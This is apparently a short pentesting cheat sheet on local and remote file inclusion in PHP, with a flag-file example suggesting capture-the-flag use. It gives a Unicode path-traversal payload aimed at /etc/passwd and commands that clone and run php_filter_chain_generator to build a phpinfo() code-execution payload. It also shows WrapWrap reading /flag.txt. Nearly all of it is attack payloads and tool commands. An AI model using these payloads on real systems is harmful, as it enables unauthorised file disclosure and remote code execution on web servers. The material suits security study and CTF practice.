LFI-RFI

Resources

Unicode

# u+FE30
︰/︰/︰/︰/︰/︰/︰/etc/passwd

LFI 2 RCE

PHP Filter Chain

git clone https://github.com/synacktiv/php_filter_chain_generator
cd php_filter_chain_generator
python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

PHP Suffix | Prefix Needed

WrapWrap generates a php://filter chain that adds a prefix and a suffix to the contents of a file.

git clone https://github.com/ambionics/wrapwrap
cd wrapwrap
# ten is a dependency
git clone https://github.com/cfreal/ten
cd ten
pip3 install .
python3 wrapwrap.py /flag.txt '504e47' '' 1000

LFI-Reader

Last updated